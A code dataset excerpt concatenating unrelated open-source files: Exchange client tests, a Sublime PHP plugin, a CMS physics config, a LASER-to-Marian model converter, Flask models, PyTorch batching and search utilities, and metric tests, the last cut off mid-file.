max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/exchange2010/test_get_folder.py | tedeler/pyexchange | 128 | 12652204 | """
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");?you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software?distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
import unittest
import httpretty
from pytest import raises
from pyexchange import Exchange2010Service
from pyexchange.connection import ExchangeNTLMAuthConnection
from pyexchange.exceptions import *
from .fixtures import *
class Test_ParseFolderResponseData(unittest.TestCase):
folder = None
@classmethod
def setUpClass(cls):
@httpretty.activate # this decorator doesn't play nice with @classmethod
def fake_folder_request():
service = Exchange2010Service(
connection=ExchangeNTLMAuthConnection(
url=FAKE_EXCHANGE_URL,
username=FAKE_EXCHANGE_USERNAME,
password=<PASSWORD>,
)
)
httpretty.register_uri(
httpretty.POST,
FAKE_EXCHANGE_URL,
body=GET_FOLDER_RESPONSE.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
return service.folder().get_folder(id=TEST_FOLDER.id)
cls.folder = fake_folder_request()
def test_canary(self):
assert self.folder is not None
def test_folder_id_was_not_changed(self):
assert self.folder.id == TEST_FOLDER.id
def test_folder_has_a_name(self):
assert self.folder.display_name == TEST_FOLDER.display_name
def test_folder_has_a_parent(self):
assert self.folder.parent_id == TEST_FOLDER.parent_id
def test_folder_type(self):
assert self.folder.folder_type == TEST_FOLDER.folder_type
class Test_FailingToGetFolders(unittest.TestCase):
service = None
@classmethod
def setUpClass(cls):
cls.service = Exchange2010Service(
connection=ExchangeNTLMAuthConnection(
url=FAKE_EXCHANGE_URL,
username=FAKE_EXCHANGE_USERNAME,
password=FAKE_EXCHANGE_PASSWORD
)
)
@httpretty.activate
def test_requesting_an_folder_id_that_doest_exist_throws_exception(self):
httpretty.register_uri(
httpretty.POST, FAKE_EXCHANGE_URL,
body=FOLDER_DOES_NOT_EXIST.encode('utf-8'),
content_type='text/xml; charset=utf-8',
)
with raises(ExchangeItemNotFoundException):
self.service.folder().get_folder(id=TEST_FOLDER.id)
@httpretty.activate
def test_requesting_an_folder_and_getting_a_500_response_throws_exception(self):
httpretty.register_uri(
httpretty.POST,
FAKE_EXCHANGE_URL,
body=u"",
status=500,
content_type='text/xml; charset=utf-8',
)
with raises(FailedExchangeException):
self.service.folder().get_folder(id=TEST_FOLDER.id)
|
php_companion/commands/import_use_command.py | risingphoenix/SublimePHPCompanion | 979 | 12652206 | import sublime
import sublime_plugin
from ..settings import get_setting
class ImportUseCommand(sublime_plugin.TextCommand):
def run(self, edit, namespace):
self.namespace = namespace
if self.is_already_used():
return self.view.show_popup('Use already exist!',
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
self.insert_use(edit)
def insert_use(self, edit):
if self.is_first_use():
for location in [r"^\s*namespace\s+[\w\\]+[;{]", r"<\?php"]:
inserted = self.insert_first_use(location, edit)
if inserted:
break
else:
self.insert_use_among_others(edit)
def insert_first_use(self, where, edit):
region = self.view.find(where, 0)
if not region.empty():
line = self.view.line(region)
self.view.insert(edit, line.end(), "\n\n" + self.build_uses())
self.view.show_popup('Successfully imported ' + self.namespace,
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
return True
return False
def insert_use_among_others(self, edit):
regions = self.view.find_all(r"^(use\s+.+[;])", 0)
if len(regions) > 0:
region = regions[0]
for r in regions:
region = region.cover(r)
self.view.replace(edit, region, self.build_uses())
self.view.show_popup('Successfully imported ' + self.namespace,
flags=sublime.HIDE_ON_MOUSE_MOVE_AWAY)
def build_uses(self):
uses = []
use_stmt = "use " + self.namespace + ";"
self.view.find_all(r"^(use\s+.+[;])", 0, '$1', uses)
uses.append(use_stmt)
uses = list(set(uses))
uses.sort()
if get_setting("use_sort_length"):
uses.sort(key = len)
return "\n".join(uses)
def is_already_used(self):
region = self.view.find(("use " + self.namespace + ";").replace('\\', '\\\\'), 0)
return not region.empty()
def is_first_use(self):
return len(self.view.find_all(r"^(use\s+.+[;])", 0)) == 0
|
Validation/RecoVertex/test/demoProducePrimaryVertex_cfg.py | ckamtsikis/cmssw | 852 | 12652216 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DempProduce")
#keep the logging output to a nice level
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
process.GlobalTag.globaltag= "START3X_V25B::All"
process.load("Configuration.EventContent.EventContent_cff")
extendAOD = cms.untracked.vstring(
'drop *',
'keep *_source_*_*',
'keep *_VtxSmeared_*_*',
'keep SimTracks_g4SimHits_*_*',
'keep SimVertexs_g4SimHits_*_*',
'keep *_offlinePrimaryVertices_*_Demo',
'keep recoTracks_generalTracks_*_*')
process.AODSIMEventContent.outputCommands.extend(extendAOD)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = process.AODSIMEventContent.outputCommands,
fileName = cms.untracked.string('reco.root')
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('/store/mc/Spring10/MinBias/GEN-SIM-RECO/START3X_V25B_356ReReco-v1/0004/0E72CE54-F43B-DF11-A06F-0026189438BD.root')
)
process.load("RecoVertex.Configuration.RecoVertex_cff")
process.dump = cms.EDAnalyzer("EventContentAnalyzer")
process.Tracer = cms.Service("Tracer",
indention = cms.untracked.string('$$')
)
process.p = cms.Path(process.vertexreco)
process.outpath = cms.EndPath(process.out)
|
scripts/laser/laser2marian.py | delong-coder/marian-dev | 829 | 12652229 | import numpy as np
import sys
import yaml
import argparse
import torch
parser = argparse.ArgumentParser(description='Convert LASER model to Marian weight file.')
parser.add_argument('--laser', help='Path to LASER PyTorch model', required=True)
parser.add_argument('--marian', help='Output path for Marian weight file', required=True)
args = parser.parse_args()
laser = torch.load(args.laser)
config = dict()
config["type"] = "laser"
config["input-types"] = ["sequence"]
config["dim-vocabs"] = [laser["params"]["num_embeddings"]]
config["version"] = "laser2marian.py conversion"
config["enc-depth"] = laser["params"]["num_layers"]
config["enc-cell"] = "lstm"
config["dim-emb"] = laser["params"]["embed_dim"]
config["dim-rnn"] = laser["params"]["hidden_size"]
yaml.dump(laser["dictionary"], open(args.marian + ".vocab.yml", "w"))
marianModel = dict()
def transposeOrder(mat):
matT = np.transpose(mat) # just a view with changed row order
return matT.flatten(order="C").reshape(matT.shape) # force row order change and reshape
def convert(pd, srcs, trg, transpose=True, bias=False, lstm=False):
num = pd[srcs[0]].detach().numpy()
for i in range(1, len(srcs)):
num += pd[srcs[i]].detach().numpy()
out = num
if bias:
num = np.atleast_2d(num)
else:
if transpose:
num = transposeOrder(num) # transpose with row order change
if lstm: # different order in pytorch than marian
stateDim = int(num.shape[-1] / 4)
i = np.copy(num[:, 0*stateDim:1*stateDim])
f = np.copy(num[:, 1*stateDim:2*stateDim])
num[:, 0*stateDim:1*stateDim] = f
num[:, 1*stateDim:2*stateDim] = i
marianModel[trg] = num
for k in laser:
print(k)
for k in laser["model"]:
print(k, laser["model"][k].shape)
convert(laser["model"], ["embed_tokens.weight"], "encoder_Wemb", transpose=False)
for i in range(laser["params"]["num_layers"]):
convert(laser["model"], [f"lstm.weight_ih_l{i}"], f"encoder_lstm_l{i}_W", lstm=True)
convert(laser["model"], [f"lstm.weight_hh_l{i}"], f"encoder_lstm_l{i}_U", lstm=True)
convert(laser["model"], [f"lstm.bias_ih_l{i}", f"lstm.bias_hh_l{i}"], f"encoder_lstm_l{i}_b", bias=True, lstm=True) # needs to be summed!
convert(laser["model"], [f"lstm.weight_ih_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_W", lstm=True)
convert(laser["model"], [f"lstm.weight_hh_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_U", lstm=True)
convert(laser["model"], [f"lstm.bias_ih_l{i}_reverse", f"lstm.bias_hh_l{i}_reverse"], f"encoder_lstm_l{i}_reverse_b", bias=True, lstm=True) # needs to be summed!
for m in marianModel:
print(m, marianModel[m].shape)
configYamlStr = yaml.dump(config, default_flow_style=False)
desc = list(configYamlStr)
npDesc = np.chararray((len(desc),))
npDesc[:] = desc
npDesc.dtype = np.int8
marianModel["special:model.yml"] = npDesc
print("\nMarian config:")
print(configYamlStr)
print("Saving Marian model to %s" % (args.marian,))
np.savez(args.marian, **marianModel) |
Flask/models.py | Zhgx/bili | 166 | 12652264 | # pip install flask-sqlalchemy
from flask_sqlalchemy import SQLAlchemy
from flask import Flask
app = Flask(__name__)
# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:[email protected]:3306/test'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + "/home/lmp/test.db"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'xxx'
db = SQLAlchemy(app)
# 学生表
class Student(db.Model):
__tablename__ = "student"
id = db.Column(db.Integer, primary_key=True) # id号(独一无二的)
name = db.Column(db.String(64), nullable=False) # 学生姓名
gender = db.Column(db.Enum("男", "女"), nullable=False) # 学生性别
phone = db.Column(db.String(11), unique=True, nullable=False) # 学生手机号
courses = db.relationship("Course", secondary="student_course", backref="students") # 关系关联
grades = db.relationship("Grade", backref="student") # 成绩关系关联
# 学生-课程中间表
class StudentCourse(db.Model):
__tablename__ = "student_course"
id = db.Column(db.Integer, primary_key=True) # id号(独一无二的)
students_id = db.Column(db.Integer, db.ForeignKey("student.id")) # 学生的id
courses_id = db.Column(db.Integer, db.ForeignKey("course.id")) # 课程的id
# 课程表
class Course(db.Model):
__tablename__ = "course"
id = db.Column(db.Integer, primary_key=True) # id号(独一无二的)
name = db.Column(db.String(32), unique=True) # 课程名字
teacher_id = db.Column(db.Integer, db.ForeignKey("teacher.id")) # 所属老师的id
grades = db.relationship("Grade", backref="course") # 成绩关系关联
# 教师表
class Teacher(db.Model):
__tablename__ = "teacher"
id = db.Column(db.Integer, primary_key=True) # id号(独一无二的)
name = db.Column(db.String(32), unique=True) # 姓名
phone = db.Column(db.String(11), unique=True, nullable=False) # 手机号
gender = db.Column(db.Enum("男", "女"), nullable=False) # 性别
course = db.relationship("Course", backref="teacher") # 所教课程
# 成绩表
class Grade(db.Model):
__tablename__ = "grade"
id = db.Column(db.Integer, primary_key=True) # id号(独一无二的)
my_grade = db.Column(db.String(32), unique=True) # 分数
course_id = db.Column(db.Integer, db.ForeignKey("course.id")) # 所属课程
students_id = db.Column(db.Integer, db.ForeignKey("student.id")) # 所属学生
if __name__ == "__main__":
db.create_all()
# db.drop_all()
|
seq2seq/tools/__init__.py | eladhoffer/seq2seq.pytorch | 587 | 12652266 | <filename>seq2seq/tools/__init__.py
import torch
from random import randrange
from math import floor
from torch.nn.utils.rnn import pack_padded_sequence, PackedSequence
from .config import PAD
def _limit_lengths(seqs, max_length=None, max_tokens=None):
max_length = max_length or float('inf')
lengths = [min(s.nelement(), max_length) for s in seqs]
if max_tokens is not None:
num_tokens = sum(lengths)
if num_tokens > max_tokens:
max_length = int(floor(num_tokens / len(seqs)))
lengths = [min(length, max_length) for length in lengths]
return lengths
# def _limit_batch_tokens(seqs, max_length=None, max_tokens=None, log=False):
# """
# seqs: a list of Tensors to be batched together
# max_length: maximum sequence length permitted
# max_tokens: maximum number of tokens (with padding) permitted -- batch will be trimed if exceeded
# """
# max_length = max_length or float('inf')
# lengths = [min(s.nelement(), max_length) for s in seqs]
# if max_tokens is not None:
# num_tokens = max(lengths) * len(seqs)
# if num_tokens > max_tokens: # needs to restrict batch size to fit maximum tokens
# # account for padding in final tensor
# padded_lengths = np.maximum.accumulate(lengths)
# num_tokens_batch = padded_lengths * (np.arange(len(seqs)) + 1)
# # determine new batch size and trim sequence
# B = int((num_tokens_batch > max_tokens).argmax() - 1)
# seqs = seqs[:B]
# lengths = lengths[:B]
# if log:
# logging.debug('Trimmed batch to %s as number of tokens was > %s'
# % (B, max_tokens))
# return seqs, lengths
def batch_sequences(seqs, max_length=None, max_tokens=None, fixed_length=None, batch_first=False, pad_value=PAD,
sort=False, pack=False, augment=False, device=None, dtype=torch.long):
"""
seqs: a list of Tensors to be batched together
max_length: maximum sequence length permitted
max_tokens: maximum number of tokens in batch permitted
"""
batch_dim, time_dim = (0, 1) if batch_first else (1, 0)
if fixed_length is not None:
fixed_length = max_length = min(max_length, fixed_length)
if len(seqs) == 1 and not fixed_length:
lengths = _limit_lengths(seqs, max_length, max_tokens)
seq_tensor = seqs[0].view(-1,)[:lengths[0]]
seq_tensor = seq_tensor.unsqueeze(batch_dim)\
.to(dtype=dtype, device=device)
else:
if sort:
seqs.sort(key=len, reverse=True)
lengths = _limit_lengths(seqs, max_length, max_tokens)
batch_length = max(lengths) if fixed_length is None\
else fixed_length
tensor_size = (len(seqs), batch_length) if batch_first \
else (batch_length, len(seqs))
seq_tensor = torch.full(tensor_size, pad_value,
dtype=dtype, device=device)
for i, seq in enumerate(seqs):
start_seq = 0
end_seq = lengths[i]
if augment and end_seq < seq.nelement():
delta = randrange(seq.nelement() - end_seq + 1)
start_seq += delta
end_seq += delta
seq_tensor.narrow(time_dim, 0, lengths[i]).select(batch_dim, i)\
.copy_(seq[start_seq:end_seq])
if pack:
seq_tensor = pack_padded_sequence(
seq_tensor, lengths, batch_first=batch_first)
if device is not None: # batch_sizes is not casted to device by default
seq_tensor = PackedSequence(seq_tensor.data,
seq_tensor.batch_sizes.to(device))
return (seq_tensor, lengths)
def batch_nested_sequences(seqs_subseqs, max_length=None, max_tokens=None, fixed_length=None, batch_first=True, pad_value=PAD,
augment=False, device=None, dtype=torch.long):
"""
seqs: a list of Tensors to be batched together
sub_seqs: a list of list of Tensors to be batched together
max_length: maximum sequence length permitted
max_tokens: maximum number of tokens in batch permitted
"""
seqs, sub_seqs = zip(*seqs_subseqs)
batch_dim, time_dim = (0, 1) if batch_first else (1, 0)
if fixed_length is not None:
fixed_length = max_length = min(max_length, fixed_length)
lengths = _limit_lengths(seqs, max_length, max_tokens)
sub_seqs = [s[:length] for s, length in zip(sub_seqs, lengths)]
sub_lengths = [[sub.nelement() for sub in s] for s in sub_seqs]
batch_length = max(lengths) if fixed_length is None\
else fixed_length
batch_sub_length = max([max([s2.numel() for s2 in s1]) for s1 in sub_seqs])
sub_tensor_size = (len(seqs), batch_length, batch_sub_length) if batch_first \
else (batch_length, batch_sub_length, len(seqs))
sub_seq_tensor = torch.full(sub_tensor_size, pad_value,
dtype=dtype, device=device)
tensor_size = (len(seqs), batch_length) if batch_first \
else (batch_length, len(seqs))
seq_tensor = torch.full(tensor_size, pad_value,
dtype=dtype, device=device)
for i, seq in enumerate(seqs):
end_seq = lengths[i]
seq_tensor.narrow(time_dim, 0, lengths[i]).select(batch_dim, i)\
.copy_(seq[0:end_seq])
for j, sub_seq in enumerate(sub_seqs[i]):
end_sub_seq = sub_lengths[i][j]
sub_seq_tensor\
.narrow(time_dim+1, 0, end_sub_seq)\
.select(time_dim, j)\
.select(batch_dim, i)\
.copy_(sub_seq[0:end_sub_seq])
return (seq_tensor, lengths), (sub_seq_tensor, sub_lengths)
|
fooltrader/sched/sched_china_stock_quote.py | beaquant/fooltrader | 1,103 | 12652268 | # -*- coding: utf-8 -*-
import logging
from apscheduler.schedulers.background import BackgroundScheduler
from fooltrader.connector import es_connector
from fooltrader.datamanager.china_stock_manager import crawl_stock_quote, crawl_index_quote
from fooltrader.settings import STOCK_START_CODE, STOCK_END_CODE
from fooltrader.utils.utils import init_process_log
init_process_log('crawling_china_stock_quote.log')
logger = logging.getLogger(__name__)
sched = BackgroundScheduler()
@sched.scheduled_job('cron', hour=17, minute=00)
def scheduled_job1():
crawl_stock_quote(STOCK_END_CODE, STOCK_END_CODE)
es_connector.kdata_to_es(STOCK_START_CODE, STOCK_END_CODE)
@sched.scheduled_job('cron', hour=18, minute=00)
def scheduled_job2():
crawl_index_quote()
es_connector.kdata_to_es(security_type='index')
if __name__ == '__main__':
logger.info("start crawling stock china stock quote")
crawl_stock_quote(STOCK_START_CODE, STOCK_END_CODE)
crawl_index_quote()
logger.info("shed crawling china stock quote")
sched.start()
logger.info("I would crawl china stock quote at 17:00 everyday")
sched._thread.join()
|
src/mylib/sklearn/fe/pair_count_encoder.py | murez/mobile-semantic-segmentation | 713 | 12652323 | import pandas as pd
from sklearn.base import TransformerMixin
from sklearn.decomposition import TruncatedSVD
import numpy as np
# https://www.kaggle.com/matleonard/categorical-encodings
class PairCountEncoder(TransformerMixin):
def __init__(self, n_components=3, seed=123):
self.svd = TruncatedSVD(n_components=n_components, random_state=seed)
self.svd_encoding = None
def fit(self, X, y=None):
df = pd.concat((
pd.DataFrame(X.values, columns=['main', 'sub']),
pd.DataFrame(np.ones(len(X)), columns=['y'])
), axis=1)
pair_counts = df.groupby(['main', 'sub'])['y'].count()
mat = pair_counts.unstack(fill_value=0)
self.svd_encoding = pd.DataFrame(self.svd.fit_transform(mat), index=mat.index)
return self
def transform(self, X, y=None):
return self.svd_encoding.reindex(X.values[:, 0]).values
|
search/utils.py | IAmPara0x/yuno | 349 | 12652337 | from typing import (Callable, Optional, List, TypeVar, Tuple, Dict, Union)
from cytoolz.curried import ( # type: ignore
curry, compose, flip, nth, concat, itemmap, groupby, filter)
from returns.maybe import Maybe, Nothing
import numpy as np
import torch
from .config import Config
from .base import Data
A = TypeVar("A")
Result = List[Tuple[Data, float]]
Tensor = torch.Tensor
getattr = compose(curry, flip)(getattr)
fst = nth(0)
snd = nth(1)
def sigmoid(x: np.ndarray) -> np.ndarray:
return 1 / (1 + np.exp(-x))
def get_config(config: Optional[Config], default_cfg: A, name: str) -> A:
m_cfg: Maybe[A] = Maybe.from_optional(config).bind_optional(
lambda cfg: getattr(name, cfg))
if m_cfg == Nothing:
cfg = default_cfg
else:
cfg = m_cfg.unwrap()
return cfg
def datas_filter(pred: Callable[[Data], bool],
datas: List[Data]) -> List[Data]:
return compose(list, filter(pred))(datas)
def group_data(attr: str, datas: List[Data],
scores: np.ndarray) -> Dict[A, Result]:
return groupby(compose(getattr(attr), fst), zip(datas, scores))
def ungroup_data(fn, grp_datas):
datas, scores = map(list, zip(*concat(itemmap(fn, grp_datas).values(), )))
return datas, scores
def pair_sim(mat1: Tensor, mat2: Tensor) -> Tensor:
return torch.cosine_similarity(mat1.unsqueeze(1), mat2, dim=-1)
def from_vstack(mat: Union[np.ndarray, List[np.ndarray]]) -> Tensor:
return compose(torch.from_numpy, np.vstack)(mat)
def l2_approx(x: Tensor, mat: Tensor, mat_t: Tensor) -> Tensor:
return torch.inverse(mat_t @ mat) @ mat_t @ x
def rescale_scores(
t_min: float = 1,
t_max: float = 2,
inverse: bool = False) -> Callable[[np.ndarray], np.ndarray]:
def dispatch(scores: np.ndarray) -> np.ndarray:
r_min, r_max = min(scores), max(scores)
if inverse:
scaled_scores = (r_min - scores) / (r_max - r_min)
return scaled_scores * (t_max - t_min) + t_max
else:
scaled_scores = (scores - r_min) / (r_max - r_min)
return scaled_scores * (t_max - t_min) + t_min
return dispatch
@curry
def cos_sim(v1: np.ndarray, v2: np.ndarray) -> np.ndarray:
return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
def top_subset_sum(arr: Tensor, t: float) -> List[int]:
_, idxs = torch.sort(arr, descending=True)
for i in range(1, len(idxs) + 1):
if torch.sum(arr[idxs[:i]]) >= t:
return idxs[:i].tolist()
return idxs.tolist()
|
model_search/metric_fns_test.py | dywsjtu/model_search | 3,315 | 12652355 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# List as: python3
"""Tests for model_search.metric_fns."""
from absl.testing import parameterized
from model_search import metric_fns
import numpy as np
import tensorflow.compat.v2 as tf
class MetricFnsTest(tf.test.TestCase, parameterized.TestCase):
# pylint: disable=g-long-lambda
# tf.constant must be called in a lambda, otherwise the Op would be created
# in a different graph from where it would be used, which is not allowed.
@parameterized.named_parameters(
{
'testcase_name':
'int64_label_single_task',
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
'predictions_fn':
lambda: {
'predictions': tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy': np.float32(0.2)
}
}, {
'testcase_name':
'string_label_single_task',
'label_vocabulary': ['A', 'B', 'C', 'D', 'E'],
'labels_fn':
lambda: tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'predictions_fn':
lambda: {
'predictions': tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy': np.float32(0.2)
}
}, {
'testcase_name':
'string_label_no_vocab_single_task',
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'predictions_fn':
lambda: {
'predictions': tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {}
}, {
'testcase_name':
'int64_label_multi_task',
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a': tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
'task_b': tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([1, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 0, 0], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.6),
},
}, {
'testcase_name':
'string_label_multi_task',
'label_vocabulary': {
'task_a': ['A', 'B', 'C', 'D', 'E'],
'task_b': ['F', 'G', 'H', 'I', 'J'],
},
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant(['F', 'G', 'H', 'I', 'J'], dtype=tf.string),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.2),
},
}, {
'testcase_name':
'mixed_label_multi_task',
'label_vocabulary': {
'task_a': ['A', 'B', 'C', 'D', 'E'],
},
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant([1, 1, 0, 0, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_a': np.float32(0.2),
'accuracy/task_b': np.float32(0.4),
},
}, {
'testcase_name':
'string_no_vocab_multi_task',
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a':
tf.constant(['A', 'B', 'C', 'D', 'E'], dtype=tf.string),
'task_b':
tf.constant([1, 1, 0, 0, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'predictions':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_a':
tf.constant([0, 0, 0, 0, 0], dtype=tf.int64),
'predictions/task_b':
tf.constant([1, 1, 1, 1, 1], dtype=tf.int64),
},
'expected_metric_dict': {
'accuracy/task_b': np.float32(0.4),
},
})
# pylint: enable=g-long-lambda
def test_make_accuracy_metric_fn(self, label_vocabulary, labels_fn,
predictions_fn, expected_metric_dict):
# Force graph mode
with tf.compat.v1.Graph().as_default():
metric_fn = metric_fns.make_accuracy_metric_fn(label_vocabulary)
actual_metric_dict = metric_fn(labels_fn(), predictions_fn())
with self.test_session() as sess:
sess.run(tf.compat.v1.initializers.local_variables())
sess.run(tf.compat.v1.initializers.tables_initializer())
actual_metric_dict_val = sess.run(actual_metric_dict)
actual_metric_dict_val_clean = {
metric_key: metric_val[1]
for metric_key, metric_val in actual_metric_dict_val.items()
}
self.assertEqual(expected_metric_dict, actual_metric_dict_val_clean)
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
{
'testcase_name':
'roc_perfect',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(1.0)
}
}, {
'testcase_name':
'roc_perfect_vocab',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary': ['ZERO', 'ONE'],
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(1.0)
}
}, {
'testcase_name':
'roc_random',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.5, 0.5], [0.5, 0.5]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_roc': np.float32(0.5)
}
}, {
'testcase_name':
'pr_perfect',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(1.0)
}
}, {
'testcase_name':
'pr_perfect_vocab',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary': ['ZERO', 'ONE'],
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(1.0)
}
}, {
'testcase_name':
'pr_random',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.5, 0.5], [0.5, 0.5]], dtype=tf.float32),
},
'expected_metric_dict': {
'auc_pr': np.float32(0.5)
}
})
# pylint: enable=g-long-lambda
def test_auc_metric_fn(self, metric_fn_factory, label_vocabulary, labels_fn,
predictions_fn, expected_metric_dict):
# Force graph mode
with tf.compat.v1.Graph().as_default():
metric_fn = metric_fn_factory(label_vocabulary)
actual_metric_dict = metric_fn(labels_fn(), predictions_fn())
with self.test_session() as sess:
sess.run(tf.compat.v1.initializers.local_variables())
sess.run(tf.compat.v1.initializers.tables_initializer())
actual_metric_dict_val = sess.run(actual_metric_dict)
actual_metric_dict_val_clean = {
metric_key: metric_val[1]
for metric_key, metric_val in actual_metric_dict_val.items()
}
self.assertAllClose(expected_metric_dict, actual_metric_dict_val_clean)
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
{
'testcase_name':
'roc_multi_task',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: {
'task_a': tf.constant([1, 0], dtype=tf.int64),
'task_b': tf.constant([1, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_a':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_b':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'exception_class':
NotImplementedError,
}, {
'testcase_name':
'roc_rank3_prob_tensor',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[[0.5, 0.5], [0.5, 0.5]],
[[0.5, 0.5], [0.5, 0.5]]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'roc_prob_tensor_3_classes',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([2, 1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'pr_multi_task',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: {
